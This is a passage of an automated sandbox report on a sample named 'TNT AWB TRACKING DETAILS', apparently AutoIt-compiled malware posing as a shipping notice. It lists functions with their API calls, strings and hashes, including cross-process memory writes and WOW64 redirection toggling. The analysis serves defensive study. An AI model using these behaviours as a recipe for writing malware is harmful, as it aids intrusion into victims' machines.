                                                    • Instruction Fuzzy Hash: ABF06875640308BFE7110FA5DCC8EA73BADFF867A4B100025F949D6150CBA19D46EA60
                                                    Function 00F1C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003E9), ref: 00F1C1F7
                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00F1C20E
                                                    • MessageBeep.USER32(00000000), ref: 00F1C226
                                                    • KillTimer.USER32(?,0000040A), ref: 00F1C242
                                                    • EndDialog.USER32(?,00000001), ref: 00F1C25C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                    • String ID:
                                                    • API String ID: 3741023627-0
                                                    • Opcode ID: 8e72dd86ad2a5f4a0dbc58a88b4eadceb46b1ef17892cb9b246e2f052e52034c
                                                    • Instruction ID: 2de4a4b6a298467f25b857f915e78a5b823cb87095f31b20cb9095319c8b5919
                                                    • Opcode Fuzzy Hash: 8e72dd86ad2a5f4a0dbc58a88b4eadceb46b1ef17892cb9b246e2f052e52034c
                                                    • Instruction Fuzzy Hash: A001DB348443089BEB205B54DD4EFD677B8FF11705F00026DF986A14E0D7F46988EB90
                                                    Function 00EC13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EndPath.GDI32(?), ref: 00EC13BF
                                                    • StrokeAndFillPath.GDI32(?,?,00EFB888,00000000,?), ref: 00EC13DB
                                                    • SelectObject.GDI32(?,00000000), ref: 00EC13EE
                                                    • DeleteObject.GDI32 ref: 00EC1401
                                                    • StrokePath.GDI32(?), ref: 00EC141C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                    • String ID:
                                                    • API String ID: 2625713937-0
                                                    • Opcode ID: 0acb7bad4349fbfa7ded16edbbaef8e9278289c8a51a5587f4de12821b3e9064
                                                    • Instruction ID: 6cf033c407bdcc7f45f3bb1261d532ba6379e28306f1fc9aba7b77958fa16489
                                                    • Opcode Fuzzy Hash: 0acb7bad4349fbfa7ded16edbbaef8e9278289c8a51a5587f4de12821b3e9064
                                                    • Instruction Fuzzy Hash: C1F0313400474CDBDB155F1AED4CBA83FE4BB5272AF189269F829580F2C7314596EF10
                                                    Function 00F2C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 00F2C432
                                                    • CoCreateInstance.OLE32(00F52D6C,00000000,00000001,00F52BDC,?), ref: 00F2C44A
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                    • CoUninitialize.OLE32 ref: 00F2C6B7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                                    • String ID: .lnk
                                                    • API String ID: 2683427295-24824748
                                                    • Opcode ID: 88f3b07931c8702be36be92e954e2fedcaf66b8790467b26eaa1e43276619a20
                                                    • Instruction ID: f149b3a5d5f269ee3eefcb58004220fe3db6530f8e706060a1c1147a27ff37a5
                                                    • Opcode Fuzzy Hash: 88f3b07931c8702be36be92e954e2fedcaf66b8790467b26eaa1e43276619a20
                                                    • Instruction Fuzzy Hash: EBA14B72104305AFD304EF54CD81EABB7E8EF99354F00491CF5959B1A2DB71E94ACB52
                                                    Function 00ED2CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EE0DB6: std::exception::exception.LIBCMT ref: 00EE0DEC
                                                      • Part of subcall function 00EE0DB6: __CxxThrowException@8.LIBCMT ref: 00EE0E01
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                      • Part of subcall function 00EC7A51: _memmove.LIBCMT ref: 00EC7AAB
                                                    • __swprintf.LIBCMT ref: 00ED2ECD
                                                    Strings
                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00ED2D66
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                    • API String ID: 1943609520-557222456
                                                    • Opcode ID: 40276975b0e2f2280b9e1a053a8bd033e314d53405332550948de1feafd07dd5
                                                    • Instruction ID: 31941132a8354b969b9551e6d375c8a5b97cbfee5e4e5ba2eac56696db2effaf
                                                    • Opcode Fuzzy Hash: 40276975b0e2f2280b9e1a053a8bd033e314d53405332550948de1feafd07dd5
                                                    • Instruction Fuzzy Hash: 75919DB21083019FCB14EF24C985D6EB7E4EF95310F00281EF991EB2A1EA71ED46DB52
                                                    Function 00F2B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EC4743,?,?,00EC37AE,?), ref: 00EC4770
                                                    • CoInitialize.OLE32(00000000), ref: 00F2B9BB
                                                    • CoCreateInstance.OLE32(00F52D6C,00000000,00000001,00F52BDC,?), ref: 00F2B9D4
                                                    • CoUninitialize.OLE32 ref: 00F2B9F1
                                                      • Part of subcall function 00EC9837: __itow.LIBCMT ref: 00EC9862
                                                      • Part of subcall function 00EC9837: __swprintf.LIBCMT ref: 00EC98AC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                    • String ID: .lnk
                                                    • API String ID: 2126378814-24824748
                                                    • Opcode ID: 018f33359ce735a0e6cad5b52b78af2cd2026c4090079956a055797df862c9d9
                                                    • Instruction ID: d9c0cd2c9321abfdff3c0dfe86d3ec8174effe5afc68cf8c42d335f9c13d33f7
                                                    • Opcode Fuzzy Hash: 018f33359ce735a0e6cad5b52b78af2cd2026c4090079956a055797df862c9d9
                                                    • Instruction Fuzzy Hash: F7A146756043159FCB04DF14C584E5ABBE5FF89324F148998F899AB3A2CB32EC46CB91
                                                    Function 00EE501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __startOneArgErrorHandling.LIBCMT ref: 00EE50AD
                                                      • Part of subcall function 00EF00F0: __87except.LIBCMT ref: 00EF012B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ErrorHandling__87except__start
                                                    • String ID: pow
                                                    • API String ID: 2905807303-2276729525
                                                    • Opcode ID: b432bda8f5f495b9a5008c7b31ae86874376821c082a18946861df6288ee5181
                                                    • Instruction ID: a35443c49facb7f6c45357636cf179c2242957a9481c8071b68e6afb2db10a27
                                                    • Opcode Fuzzy Hash: b432bda8f5f495b9a5008c7b31ae86874376821c082a18946861df6288ee5181
                                                    • Instruction Fuzzy Hash: 7951AE2290DA4D86DB11B715CC053BE3BD09B4070CF20AD99F5D5A62ABEF348DC4AA82
                                                    Function 00F08584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: 3c$_
                                                    • API String ID: 4104443479-4099079164
                                                    • Opcode ID: dba90de6778877de7382e6e76754aadfa72123355a0c52a551756b4a732628ac
                                                    • Instruction ID: 13a867c875d9460fde917a1daf7ae214d181e272f901c5175753d577eec243a1
                                                    • Opcode Fuzzy Hash: dba90de6778877de7382e6e76754aadfa72123355a0c52a551756b4a732628ac
                                                    • Instruction Fuzzy Hash: 99515170D00609DFCF24CF68C880AAEB7B1FF45354F14852AE85AE7390DB31A956EB51
                                                    Function 00F197F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00F214BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F19296,?,?,00000034,00000800,?,00000034), ref: 00F214E6
                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00F1983F
                                                      • Part of subcall function 00F21487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F192C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00F214B1
                                                      • Part of subcall function 00F213DE: GetWindowThreadProcessId.USER32(?,?), ref: 00F21409
                                                      • Part of subcall function 00F213DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00F1925A,00000034,?,?,00001004,00000000,00000000), ref: 00F21419
                                                      • Part of subcall function 00F213DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00F1925A,00000034,?,?,00001004,00000000,00000000), ref: 00F2142F
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F198AC
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F198F9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                    • String ID: @
                                                    • API String ID: 4150878124-2766056989
                                                    • Opcode ID: d04d7939cec15286619065e082a9a8e7f9fb217fb3be4dc0a9360004f4de93af
                                                    • Instruction ID: ac7d9ddb01c64fde7deac72a0b2c67980329d240fb2e2240698245fd88d6e03e
                                                    • Opcode Fuzzy Hash: d04d7939cec15286619065e082a9a8e7f9fb217fb3be4dc0a9360004f4de93af
                                                    • Instruction Fuzzy Hash: 73414F76D0111CAECB10DFA4CC51ADEBBB8EB15310F004099F949B7141DA706E85DBA0
                                                    Function 00F47946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F4F910,00000000,?,?,?,?), ref: 00F479DF
                                                    • GetWindowLongW.USER32 ref: 00F479FC
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F47A0C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$Long
                                                    • String ID: SysTreeView32
                                                    • API String ID: 847901565-1698111956
                                                    • Opcode ID: d700c4459a882d0e4e571fe6a60ce84fd15d52eca2e5bd1d4ba6c512060a3504
                                                    • Instruction ID: 518293c5c93e91565cec17ff7d444807fe9af948617db1895463c9d2a55e735a
                                                    • Opcode Fuzzy Hash: d700c4459a882d0e4e571fe6a60ce84fd15d52eca2e5bd1d4ba6c512060a3504
                                                    • Instruction Fuzzy Hash: 4631D03160420AABDB119E38CC45BEB7BA9EB05334F244729FC79A22E1D731ED51AB50
                                                    Function 00F473D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F47461
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F47475
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F47499
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: SysMonthCal32
                                                    • API String ID: 2326795674-1439706946
                                                    • Opcode ID: ed90e34ab160b9a26f48b989d32cb67637ba46e6c61e53447e5712f9c4b59690
                                                    • Instruction ID: 1e61950539be86b32117018772fa450bf82aa7a05ecee413a97bc156bccc68a9
                                                    • Opcode Fuzzy Hash: ed90e34ab160b9a26f48b989d32cb67637ba46e6c61e53447e5712f9c4b59690
                                                    • Instruction Fuzzy Hash: 2D219F32500218ABDF11DE64CC46FEA3F69EB48724F110214FE196B1A0DBB5AC95EBA0
                                                    Function 00F47B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F47C4A
                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F47C58
                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F47C5F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$DestroyWindow
                                                    • String ID: msctls_updown32
                                                    • API String ID: 4014797782-2298589950
                                                    • Opcode ID: 7d75a49a4a1144e3c6994dd0a60e5ef90e255e8fb07079eab0ee1646e55a0a4e
                                                    • Instruction ID: 5c61ef474a1af78b6554f98a09770525224ee427b950442dc7d48049795e8902
                                                    • Opcode Fuzzy Hash: 7d75a49a4a1144e3c6994dd0a60e5ef90e255e8fb07079eab0ee1646e55a0a4e
                                                    • Instruction Fuzzy Hash: F0214FB5604208AFDB11EF24DCC1DB73BECEB5A764B140059FA159B3A1CB71EC11AB60
                                                    Function 00F46CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F46D3B
                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F46D4B
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F46D70
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$MoveWindow
                                                    • String ID: Listbox
                                                    • API String ID: 3315199576-2633736733
                                                    • Opcode ID: 6bc7f1d190a2c973c1eb4d4dd216bd539fcafe0b0553569cd2de69a31c016ce4
                                                    • Instruction ID: 800e15b232e2be607ede44ba68195d9e2fbc3b7f74f39a6bd2f3ffa8027c918b
                                                    • Opcode Fuzzy Hash: 6bc7f1d190a2c973c1eb4d4dd216bd539fcafe0b0553569cd2de69a31c016ce4
                                                    • Instruction Fuzzy Hash: 9221A732A11118BFEF118F54DC85FBB3BBAEF8A764F018124FE459B190C6719C51A7A1
                                                    Function 00F4770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F47772
                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F47787
                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F47794
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: msctls_trackbar32
                                                    • API String ID: 3850602802-1010561917
                                                    • Opcode ID: 926b5e34026a2d618d4d3be0d30e950163524b1b1f13fc7c17a7b8c5c7e63724
                                                    • Instruction ID: cd0b81b12b659657738579e02ec8db165c2e5f4cf255715f1d40de51be196564
                                                    • Opcode Fuzzy Hash: 926b5e34026a2d618d4d3be0d30e950163524b1b1f13fc7c17a7b8c5c7e63724
                                                    • Instruction Fuzzy Hash: 1F112772644308BBEF106F64CC01FEB7BA9EF89B64F014118FA45A2191C772E811EB10
                                                    Function 00EC4C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00EC4B83,?), ref: 00EC4C44
                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00EC4C56
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                    • API String ID: 2574300362-1355242751
                                                    • Opcode ID: b3c834c27b74ae63152dc912af6090d1e8677c34cbd1a7a17ead6dc67b294a73
                                                    • Instruction ID: 3a44667c45192b97c12c3f2bdc6d9999b5af740bcc720142e4d7b3e828ee45c8
                                                    • Opcode Fuzzy Hash: b3c834c27b74ae63152dc912af6090d1e8677c34cbd1a7a17ead6dc67b294a73
                                                    • Instruction Fuzzy Hash: 09D0C270900713CFD7204F31CA08B06B6D4AF02348B10C83ED899D61B0E670C480E611
                                                    Function 00EC4C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00EC4BD0,?,00EC4DEF,?,00F852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00EC4C11
                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00EC4C23
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                    • API String ID: 2574300362-3689287502
                                                    • Opcode ID: adf31762fc5ddddd7ab2b15adc5851f8b2594c24fefd76a5428b42f18caf00af
